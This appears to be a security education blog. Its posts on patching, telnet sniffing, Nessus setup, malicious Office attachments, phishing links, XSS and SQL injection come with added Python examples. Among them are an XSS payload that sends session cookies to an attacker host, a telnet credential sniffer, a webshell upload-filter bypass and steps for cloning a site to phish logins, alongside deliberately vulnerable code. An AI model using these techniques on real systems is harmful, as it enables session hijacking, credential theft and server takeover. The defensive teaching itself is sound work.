The importance of updating

Another quick video to show just how quickly a server can be compromised and taken over completely by an attacker.

In this video we have a server running an out-of-date, unpatched application, which gives the attacker a way onto the server. The attacker then dumps and cracks the password hashes, which gives them persistent remote access to the system over SSH. From there they can keep coming back to the server for whatever purpose they wish.

Finally the attacker changes the root (admin) password, potentially leaving no one else with admin access to the system. That lets them hold the system to ransom, threaten to take it offline to disrupt the business, or carry on searching for and removing data unhindered.

This all happens in under 4 minutes. Always stay as up to date with versions and patches as possible.

The Importance of Encryption. Simple Demo

This is a quick video which shows, in a very basic way, how important encryption is. It is important to practice defense in depth, so that even if an attacker manages to gain persistence on your network and is able to man-in-the-middle your network connections, encryption gives another layer of protection: the communication is not in clear text, so login credentials cannot simply be read off the wire.

It’s important to remember that just because an attacker has gained a foothold does not mean they can stay there or actually do anything. If standard user permissions are well controlled, the attacker will need to elevate their privileges, and one way of doing this is capturing passwords.

The more steps an attacker needs to take to carry out their intended actions, the more chance you have of detecting them on the network.

Here we simulate an IT engineer logging in to a server terminal session, and show how an encrypted session (SSH) protects the connection compared to telnet, which communicates in clear text.
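What the man-in-the-middle position actually yields from the two kinds of session, as an added example in Python rather than a video (this is not code from the original post). The two captures are constructed by hand for the example: a telnet login and the start of an SSH session, each as a list of (direction, bytes) segments in wire order. The hostname, username and password in them are made up.

```python
import re

# Telnet protocol bytes (RFC 854) needed to strip option negotiation from the text.
IAC, SE, SB = 255, 240, 250
WILL, WONT, DO, DONT = 251, 252, 253, 254

PROMPT_RE = re.compile(r"(login|username|password)\s*:\s*$", re.IGNORECASE)


def strip_telnet_negotiation(data: bytes) -> bytes:
    """Drop IAC command sequences and CR-NUL padding, keeping only terminal text."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            if b != 0:                    # telnet sends CR as CR NUL; drop the NUL
                out.append(b)
            i += 1
        elif i + 1 >= len(data):
            break                         # truncated command at end of segment
        elif data[i + 1] == IAC:
            out.append(IAC)               # escaped literal 0xFF
            i += 2
        elif data[i + 1] in (WILL, WONT, DO, DONT):
            i += 3                        # IAC <verb> <option>
        elif data[i + 1] == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2   # subnegotiation runs up to IAC SE
        else:
            i += 2                        # any other two-byte command
    return bytes(out)


def harvest_credentials(segments):
    """Passive sniffer logic: segments is [(direction, bytes), ...] with 'S' for
    server->client and 'C' for client->server. Returns [(prompt, typed line)]
    for every line the client typed right after a login/username/password prompt."""
    server_text, client_line, pending, found = "", "", None, []
    for direction, raw in segments:
        text = strip_telnet_negotiation(raw).decode("latin-1")
        if direction == "S":
            server_text += text           # includes the server's echo of typed characters
            continue
        if pending is None:
            m = PROMPT_RE.search(server_text)
            if not m:
                continue                  # keystrokes that are not answering a prompt
            pending, client_line = m.group(1).lower(), ""
        client_line += text               # telnet clients usually send one key per segment
        if "\r" in client_line or "\n" in client_line:
            found.append((pending, client_line.rstrip("\r\n")))
            pending = None
    return found


# Constructed telnet capture: the server negotiates echo, prompts, echoes the
# username as it is typed, and does not echo the password.
TELNET_CAPTURE = [
    ("S", b"\xff\xfd\x01\xff\xfb\x01"),                 # IAC DO ECHO, IAC WILL ECHO
    ("S", b"\r\nUbuntu 16.04 LTS\r\nfileserver login: "),
    ("C", b"e"), ("S", b"e"), ("C", b"n"), ("S", b"n"), ("C", b"g"), ("S", b"g"),
    ("C", b"\r\x00"), ("S", b"\r\n"),
    ("S", b"Password: "),
    ("C", b"h"), ("C", b"unter2"), ("C", b"\r\x00"),
    ("S", b"\r\nLast login: Tue Oct 10 21:04:17 2017\r\neng@fileserver:~$ "),
]

# Constructed SSH capture: after the cleartext version banners everything is
# ciphertext (stood in for here by opaque bytes), so the same sniffer sees nothing.
SSH_CAPTURE = [
    ("C", b"SSH-2.0-OpenSSH_7.4\r\n"),
    ("S", b"SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2\r\n"),
    ("C", bytes(range(0x14, 0x60))),
    ("S", bytes(range(0x60, 0xa0))),
]
```

Run harvest_credentials over the two captures: the telnet session gives back [("login", "eng"), ("password", "hunter2")], the SSH session gives back nothing at all, which is the whole point of the video. The same logic, pointed at a real capture, is all a passive attacker on the path needs.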

How To Install Nessus Vulnerability Scanner

In our previous post we showed how to download the Home edition of Nessus and verify its hash; here we will show how to install it, set it up and run your first scan. This is a very basic setup to get you up and running quickly with the free version of Nessus. If you are going to be using it in a live production environment, don’t use this guide.

If you have not read the initial post, go here first, then come back.

You should be where we left off, which is just after computing the hash of the download and confirming it matches the published checksum, as below.

Get used to running the “ls” command to check which directory you are in and that you have access to the correct files.

We “ls” to check, as mentioned above, then use “dpkg -i” on the downloaded .deb, which unpacks and installs Nessus. dpkg needs root, so prefix it with sudo if you are not already root.

While that runs and installs we need to go back to tenable.com and get an activation code.

Fill in the details and wait for your email with the activation code.

Go back to your terminal, where the install should now have completed. Check the window for errors; if there are none we are good to continue.

Run the following as root (or with sudo): “/etc/init.d/nessusd start”. On a systemd-based distribution “systemctl start nessusd” does the same job.

Nessus is now running, so open a browser on the same machine and go to https://localhost:8834 and you should get the login screen. Your browser will warn about the self-signed certificate; that is expected for a fresh local install.

Create a username and a password to log in with for the first time (don’t forget these!) and you will get the activation page.

Leave the scanner type as it is, and enter the activation code you received by email.

If it is correct you will see the next screen. Now is the time to make a coffee, as this stage may take some time while Nessus sets up (it downloads and compiles its plugin set).

Once completed you will see the “New Scan” screen.

Select New Scan as shown, then select “Basic Network Scan”. This will let us do a basic scan of our internal home network.

We will need to find out the IP address of our machine, and from it the range our network uses, for the next step. The easiest way to do this is “ifconfig” (or “ip addr”) on a Linux box or “ipconfig” on a Windows box, run from a terminal window. Make a note of your IP address and subnet mask. (This is a simple step, so if you are unsure how to do it you really shouldn’t be installing Nessus, to be honest!)

The name and description can be whatever you want, but the targets box needs the address or range you want to scan. In the example it shows “192.168.0.0-255”, which means we are going to scan every address on our /24 network. To scan an individual host you would use a single address, for example “192.168.0.5”. Only ever point this at networks you own or have written permission to test. Now save as shown below and you’ll go back to the main page.

To start your scan click the chevron (the play button), as outlined below, then wait for your scan to complete.

Once the scan completes, the real fun starts!
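The install steps above as one script, added here as an example (the post does each step by hand; this is not code from the post or from Tenable). It assumes a Debian-based box with sudo, the .deb and the SHA256 from the Tenable download page passed on the command line, and the scanner on its default port 8834. target_range() turns the address you noted from ifconfig/ipconfig into the whole-network range the scan form takes.

```python
import hashlib
import shutil
import socket
import subprocess
import time

NESSUS_PORT = 8834   # default listener for the web UI


def sha256_of(path: str) -> str:
    """Hash the download in chunks so a large .deb never has to sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: str, expected_sha256: str) -> bool:
    """Compare against the checksum published on tenable.com (case-insensitive)."""
    return sha256_of(path) == expected_sha256.strip().lower()


def install_deb(path: str) -> None:
    """dpkg -i needs root; check=True stops the script if dpkg reports an error."""
    subprocess.run(["sudo", "dpkg", "-i", path], check=True)


def start_nessusd() -> None:
    """Prefer systemd where present, otherwise the init script the post uses."""
    if shutil.which("systemctl"):
        subprocess.run(["sudo", "systemctl", "start", "nessusd"], check=True)
    else:
        subprocess.run(["sudo", "/etc/init.d/nessusd", "start"], check=True)


def wait_for_port(host: str, port: int, timeout: float = 120.0) -> bool:
    """Return True once something accepts TCP connections on host:port."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            with socket.create_connection((host, port), timeout=1.0):
                return True
        except OSError:
            time.sleep(0.5)
    return False


def target_range(ip: str) -> str:
    """Turn your own address into the whole-/24 target string the scan form
    expects, e.g. 192.168.0.5 -> 192.168.0.0-255. Assumes a /24 home network."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError("not an IPv4 address: %r" % ip)
    return ".".join(octets[:3]) + ".0-255"


if __name__ == "__main__":
    import sys
    deb, checksum = sys.argv[1], sys.argv[2]     # path to the .deb, SHA256 from the download page
    if not verify_download(deb, checksum):
        sys.exit("checksum mismatch: do not install this file")
    install_deb(deb)
    start_nessusd()
    if not wait_for_port("127.0.0.1", NESSUS_PORT):
        sys.exit("nessusd did not come up on port %d; check the service log" % NESSUS_PORT)
    print("Nessus is up: open https://localhost:%d/ to create your account" % NESSUS_PORT)
    print("Suggested targets box for a /24:", target_range(sys.argv[3]) if len(sys.argv) > 3 else "(pass your IP as the third argument)")
```

The checksum step is the one people skip and the one that matters: a wrong hash means the file is not what Tenable published, so the script refuses to call dpkg at all.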

DDEAUTO Opens Webpage

We have already posted about DDEAUTO, but thought we’d show another one, as it’s slightly different.

If a document opens and you are greeted by a pop-up of any kind, then I’d say 99 times out of a hundred it’s going to be a malicious exploit: close and delete the document immediately and run a full anti-virus scan with at least three different free scanners.

Then 2 weeks later re-run all the scans again.

The DDEAUTO Exploit in all Microsoft Office Documents

This is the new exploit which is everywhere at the moment. DDEAUTO is a Word field code that tells the document to pull data from another application over Dynamic Data Exchange; an attacker points it at a command instead.

It’s a little different to the typical macro exploits which are normally used, because it needs no macro at all: it relies on the field being updated when the document is opened.

In general you will need to click on 2 pop ups to allow the exploit to run, however since writing this I have played around a bit more and managed to get it down to only one pop up.

The point here in this video, however, is to show that if you read what the pop-up says, you should not be clicking on it under any circumstances.

It’s true that some documents are linked dynamically to keep the data in linked sheets up to date. However, if you are using one of these you would normally know about it.

If you don’t normally use documents with linked data and you open one which asks you to allow linked data, don’t just click OK! If you know who sent it, ask them what it is, and if you don’t know where it came from you probably shouldn’t even be opening the attachment in the first place!

Then, after clicking Yes to the first pop-up, we receive a second one; this is generally where the exploit runs. Ours is very obviously named for the sake of this demonstration, but an attacker would try their best to disguise it.

We hope that by watching this video you will be a little bit more educated and perhaps won’t click on that pop up box if you receive one of these emails!

Enjoy the Video.

Excel Malicious Macro Attachment

Hello again.

It’s 2017 and we are still enabling macros in documents we receive via email! (Come on people!)

Anyway, there are still people out there who don’t believe a macro can be used this way, so here is a quick video you can show them.

In this short clip a user receives an email that appears to be from Jerry.random@uk-company.com, but you can clearly see it actually came from a Gmail address, and it contains an Excel invoice attachment.

In this example we have Excel set not to allow macros to run automatically, but we are aware that a lot of people don’t use this setting (you nutcases!).

Notice that nothing happens until the Macro is enabled!

Don’t enable a macro unless you are 100% sure what it is.

The Excel sheet contains a simple macro which opens IE and goes to a website. This demonstrates how easy it is for an attacker to use a macro to download and install malware or ransomware instead. We have used this method in our demo as it is quick and visual and seems to get the point across better than a more complicated example.
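A triage check for the two attachment tricks shown in the DDEAUTO posts above and in this macro post, added here as an example (not from the videos, and not a replacement for anti-virus): modern Office files are zip archives, so a short script can tell, before anyone opens the file, whether it carries a VBA project or a DDE field. The three sample documents are built in memory and are constructed for the example; the DDE target path in the Word sample is a placeholder.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
# A DDE field is written DDE or DDEAUTO. The text of one field can be spread
# over several instrText runs, so runs are joined per paragraph before matching.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def find_dde_fields(document_xml: bytes):
    """Field instructions in word/document.xml that would start a DDE conversation."""
    root = ET.fromstring(document_xml)
    hits = []
    for para in root.iter(W + "p"):
        instr = "".join(t.text or "" for t in para.iter(W + "instrText")).strip()
        if DDE_RE.search(instr):
            hits.append(instr)
    for fld in root.iter(W + "fldSimple"):          # single-element field form
        instr = fld.get(W + "instr", "").strip()
        if DDE_RE.search(instr):
            hits.append(instr)
    return hits


def triage(office_file: bytes) -> dict:
    """Say why a document is going to prompt the user, without opening it in Office."""
    report = {"macros": False, "dde_fields": [], "content_types": []}
    with zipfile.ZipFile(io.BytesIO(office_file)) as z:
        names = z.namelist()
        # A vbaProject.bin part means the file carries VBA, whatever its extension says.
        report["macros"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        if "[Content_Types].xml" in names:
            types = z.read("[Content_Types].xml").decode("utf-8", "replace")
            report["content_types"] = re.findall(r'ContentType="([^"]*macroEnabled[^"]*)"', types)
        if "word/document.xml" in names:
            report["dde_fields"] = find_dde_fields(z.read("word/document.xml"))
    report["prompts_expected"] = report["macros"] or bool(report["dde_fields"])
    return report


def _zip(parts: dict) -> bytes:
    """Build a minimal Office package in memory (helper for the samples below)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in parts.items():
            z.writestr(name, data)
    return buf.getvalue()


EMPTY_TYPES = '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>'

# Constructed Word document: one DDEAUTO field, its instruction split over two runs.
DDE_DOCX = _zip({
    "[Content_Types].xml": EMPTY_TYPES,
    "word/document.xml":
        '<w:document xmlns:w="%s"><w:body><w:p>' % W_NS
        + '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        + '<w:r><w:instrText xml:space="preserve"> DD</w:instrText></w:r>'
        + '<w:r><w:instrText xml:space="preserve">EAUTO "C:\\placeholder\\app.exe" "arg" </w:instrText></w:r>'
        + '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        + '</w:p></w:body></w:document>',
})

# Constructed macro-enabled workbook: the VBA part is present (its content is a stub).
MACRO_XLSM = _zip({
    "[Content_Types].xml":
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/xl/workbook.xml" '
        'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/></Types>',
    "xl/workbook.xml": "<workbook/>",
    "xl/vbaProject.bin": b"\xd0\xcf\x11\xe0 stub",
})

# Constructed plain invoice with no field codes and no VBA.
CLEAN_DOCX = _zip({
    "[Content_Types].xml": EMPTY_TYPES,
    "word/document.xml": '<w:document xmlns:w="%s"><w:body><w:p><w:r><w:t>Invoice 4471</w:t>'
                         '</w:r></w:p></w:body></w:document>' % W_NS,
})
```

It reports only the two tricks covered here: a field instruction assembled from QUOTE character codes, or a DDE formula sitting in an Excel cell, would not match, so treat an empty report as “nothing found”, not as “safe”. Anything it does flag is a file that will put one of those pop-ups in front of the user.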

Fake URL in Email

It’s 2017 and we are still clicking on links in emails!

This is a quick video to demonstrate how a link in an email displaying one address can take you somewhere completely different!

We’re going to follow this up with some videos showing malicious attachments.

Don’t trust emails!
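The two tells from the Excel clip above (a From display name that is itself an address, with the real sender somewhere else) and from this video (link text showing one URL while the href goes elsewhere), written as checks you can run over a raw message. Added example, not from the original posts; the message is constructed here and every domain in it is a placeholder (gmail.example stands in for the Gmail address in the clip).

```python
import email
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

ADDR_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
HOST_RE = re.compile(r"(?:https?://)?((?:[\w-]+\.)+[a-z]{2,})", re.IGNORECASE)


def sender_mismatch(from_header: str):
    """(shown address, real address) when the display name contains an address
    whose domain differs from the actual sender; None when there is nothing to flag."""
    display, actual = parseaddr(from_header)
    shown = ADDR_RE.search(display or "")
    if not shown:
        return None
    shown_domain = shown.group(0).rsplit("@", 1)[1].lower()
    actual_domain = actual.rsplit("@", 1)[-1].lower()
    return (shown.group(0), actual) if shown_domain != actual_domain else None


class _Links(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def link_mismatches(html_body: str):
    """Links whose visible text names a host other than the one the href really goes to."""
    p = _Links()
    p.feed(html_body)
    bad = []
    for href, text in p.links:
        shown = HOST_RE.search(text)
        if not shown:
            continue                      # text like "click here" names no host to compare
        real_host = (urlsplit(href).hostname or "").lower()
        if shown.group(1).lower() != real_host:
            bad.append((text, href))
    return bad


def phishing_indicators(raw_message: str) -> dict:
    """Run both checks over one raw RFC 822 message."""
    msg = email.message_from_string(raw_message)
    bodies = [part.get_payload(decode=True).decode(part.get_content_charset() or "utf-8", "replace")
              for part in msg.walk() if part.get_content_type() == "text/html"]
    return {
        "sender": sender_mismatch(msg.get("From", "")),
        "links": [m for body in bodies for m in link_mismatches(body)],
    }


# Constructed message: the displayed name is the company address, the real sender
# is a webmail account, and the invoice link's text and href disagree.
SAMPLE = """\
From: "Jerry.random@uk-company.com" <jerry.random.invoices@gmail.example>
To: accounts@uk-company.com
Subject: Invoice 4471
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Please review your invoice:
<a href="http://login-portal.attacker.example/inv">https://portal.uk-company.com/invoices</a></p>
<p>Questions? <a href="https://portal.uk-company.com/help">click here</a></p></body></html>
"""
```

The host comparison is deliberately exact: a link whose text says portal.uk-company.com but whose href is portal.uk-company.com.attacker.example is flagged, and so is plain http where the text promised https on a different host. Both checks are what a mail gateway rule does, written out so you can see why the email in the clip should never have got a click.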

XSS Cookie Steal

Here we demonstrate why you should be validating any user input and encoding it on output.

This shows how easy it is for an attacker to plant some malicious code on a site and steal the admin’s session cookie (or another user’s), which is as good as their login credentials, by using Cross-Site Scripting. There is a great explanation on OWASP’s website.

First we test the text areas for correct input validation, and when we find the input is not being checked or encoded we look to exploit that flaw.

We enclose the following in <script> tags and submit it as a comment: document.write('<img src="http://192.168.56.104/?'+document.cookie+'"/>'); When the admin views the page, their browser loads the “image”, so their cookies arrive in the request log on our PC. We then reuse them on the site to gain access to the admin panel, and from there we can add malicious code, create new users or look to get root access on the server. (Marking the session cookie HttpOnly would have stopped document.cookie from reading it, which is one more reason to always set it.)

The site is on 192.168.56.103 and our attacking machine is on 192.168.56.104.

To demonstrate this we are using the “XSS and MySQL File” VM from Pentesterlab.com.
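The server-side flaw and the attacker’s receiving end, as an added Python example (not code from the post or from the PentesterLab VM). The comment template and cookie names are assumed; the access-log line is constructed to look like the hit the admin’s browser leaves on the web server at 192.168.56.104 when it loads the injected image.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The payload from the post, enclosed in script tags, exactly as submitted in a comment.
PAYLOAD = """<script>document.write('<img src="http://192.168.56.104/?'+document.cookie+'"/>');</script>"""


def render_comment_vulnerable(author: str, body: str) -> str:
    """What the VM does: user input pasted straight into the page markup."""
    return f'<div class="comment"><b>{author}</b><p>{body}</p></div>'


def render_comment_safe(author: str, body: str) -> str:
    """Output encoding: every user-controlled string is HTML-escaped at the point it
    is written into HTML, so <script> reaches the browser as literal text, not markup."""
    return (f'<div class="comment"><b>{html.escape(author, quote=True)}</b>'
            f'<p>{html.escape(body, quote=True)}</p></div>')


def session_cookie_header(session_id: str) -> str:
    """Second layer: HttpOnly keeps the cookie out of document.cookie, so even a
    successful injection cannot read it; Secure keeps it off plain HTTP."""
    return f"Set-Cookie: PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


# Common log format line, as the attacker's web server writes it.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')


def cookies_from_log_line(line: str) -> dict:
    """Recover the stolen cookie(s) from the request target of one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return {}
    # document.cookie reads "a=1; b=2"; the browser percent-encodes the space.
    query = unquote(urlsplit(m.group("target")).query)
    return {k.strip(): v for k, v in parse_qsl(query.replace("; ", "&"), keep_blank_values=True)}


# Constructed log line: the admin's browser (192.168.56.1 here) fetching the "image".
SAMPLE_LOG = ('192.168.56.1 - - [12/Oct/2017:21:04:17 +0100] '
              '"GET /?PHPSESSID=3p0o5kfakeexampleid;%20admin_seen=1 HTTP/1.1" 200 0')
```

Paste PAYLOAD through render_comment_vulnerable and the script tag survives intact; through render_comment_safe it comes out as &lt;script&gt;, which the browser shows and does not run. cookies_from_log_line is the attacker’s side: one line in the log is enough to hand over the PHPSESSID value to reuse against the admin panel.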

SQL Injection to URL Redirect Part 2

In this video we start off by using “wget” to clone the site we are attacking, so that when users are redirected to our site they are less suspicious: any differences are subtle and won’t generally be noticed by normal users. Then we load the cloned pages on our web server.

For the purpose of the demo we have left the IP address showing in the address bar so you can see the difference. The original site is on .105 and our clone is on .104 (poisoning the hosts file or typo-squatting to hide that is a whole tutorial by itself).

Back to the hack. We have enough access that, if we wanted to, we could upload our own pages and replace the existing ones, but for the purpose of this video we are going to change where the login URL points so it sends users to our clone site rather than the correct login page.

We could obviously do this with every link on the site. We could also upload further malicious code to the server so that every visitor to the site has malicious script injected into their browser.

SQL Injection to URL Redirect Part 1

Today we are going to show how an attacker can leverage SQL Injection to redirect users to their own site/webpage for whatever malicious activity they choose.

This will be in two parts. The first shows how, using a tool called sqlmap, we can carry out a successful SQL injection and very quickly dump usernames and passwords. The “php?id=1” part of the URL is injectable (the id parameter goes straight into a database query), and this is what sqlmap exploits.

Then, once we have access to the admin section, we upload our PHP shell. The site has some basic filtering, so we change the filename and extension from “b374k-2.8.php” to “b374k-2.8 (copy).jpg.phtml”, which gets us past the filtering controls: the filter is looking for .php, but a typical Apache and PHP setup also executes .phtml. It also shows why, even in password-protected areas of your site, you still need robust upload controls: if someone manages to access the area they will still have to work to be able to upload a shell. Always think security in depth. Always add layers.

This video ends with us logging into the uploaded webshell and accessing the www directory.
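Both weaknesses the video chains, each beside a fixed version, as an added example (not the target site’s code): the injectable id parameter and the upload filter that a .jpg.phtml name slips past. SQLite stands in for the site’s MySQL; the table, column names and the stored password strings are placeholders.

```python
import os
import re
import secrets
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "hash-placeholder-1"), (2, "bob", "hash-placeholder-2")])
    conn.commit()
    return conn


def user_vulnerable(conn, user_id: str):
    """The 'php?id=1' pattern: the parameter is pasted into the SQL text, so an id
    of '1 OR 1=1' returns every row. This is exactly what sqlmap builds on."""
    return conn.execute(f"SELECT id, name FROM users WHERE id = {user_id}").fetchall()


def user_safe(conn, user_id: str):
    """Validate the type, then bind the value: the driver sends it separately from
    the SQL text, so the input can never change the shape of the statement."""
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (int(user_id),)).fetchall()


# Upload filtering. The first is the kind of check the video defeats.
BLACKLIST = (".php",)
# Allowed image types with the first bytes a real file of that type starts with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}


def upload_vulnerable(filename: str) -> bool:
    """Only the final extension is compared against a blacklist, so
    'b374k-2.8 (copy).jpg.phtml' passes although Apache+PHP normally runs .phtml."""
    return not filename.lower().endswith(BLACKLIST)


def upload_safe(filename: str, content: bytes) -> Optional[str]:
    """Allowlist every extension in the name, require the bytes to match the claimed
    image type, and store under a server-chosen name so the uploader never decides
    what the web server will execute. Returns the stored name, or None if rejected."""
    _, *exts = os.path.basename(filename).lower().split(".")
    if not exts or not all(re.fullmatch(r"[a-z0-9]{1,5}", e) for e in exts):
        return None                       # no extension, or junk such as "8 (copy)"
    if any(e not in ALLOWED for e in exts):
        return None                       # "jpg.phtml" fails here on "phtml"
    ext = exts[-1]
    if not content.startswith(ALLOWED[ext]):
        return None                       # name says image, bytes say otherwise
    return f"{secrets.token_hex(16)}.{ext}"
```

The two safe versions are the layers the post is asking for: even with admin-panel access taken through the injection, an upload that survives upload_safe is an image stored under a name the attacker did not choose, with no extension the interpreter will touch.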